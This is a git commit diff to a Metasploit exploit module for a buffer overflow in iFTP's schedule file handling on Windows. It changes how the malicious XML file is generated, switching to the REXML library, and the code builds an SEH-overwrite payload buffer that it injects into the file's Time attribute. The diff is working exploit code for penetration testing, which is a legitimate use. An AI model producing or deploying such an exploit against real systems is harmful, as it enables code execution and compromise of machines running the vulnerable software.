Use REXML to generate exploit file

sgabe · sgabe · commit 0b85a81b019c · 2014-12-24T19:23:28.000+01:00
diff --git a/modules/exploits/windows/fileformat/iftp_schedule_bof.rb b/modules/exploits/windows/fileformat/iftp_schedule_bof.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'rexml/document'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::FILEFORMAT
   include Msf::Exploit::Remote::Seh
+  include REXML
 
   def initialize(info = {})
     super(update_info(info,
@@ -70,10 +72,20 @@ def exploit
     evil << generate_seh_payload(target.ret)
     evil << rand_text_alpha(20000)
 
-    sploit = %Q|<?xml version="1.0" encoding="UTF-8" ?>
-    <Schedule>
-      <Event Url="" Time="#{evil}" Folder="" />
-    </Schedule>|
+    xml = Document.new
+    xml << XMLDecl.new('1.0', 'UTF-8')
+    xml.add_element('Schedule', {})
+    xml.elements[1].add_element(
+      'Event',
+      {
+        'Url' => '',
+        'Time' => 'EVIL',
+        'Folder' => ''
+      })
+
+    sploit = ''
+    xml.write(sploit, 2)
+    sploit = sploit.gsub(/EVIL/, evil)
 
     # Create the file
     print_status("Creating '#{datastore['FILENAME']}' file ...")
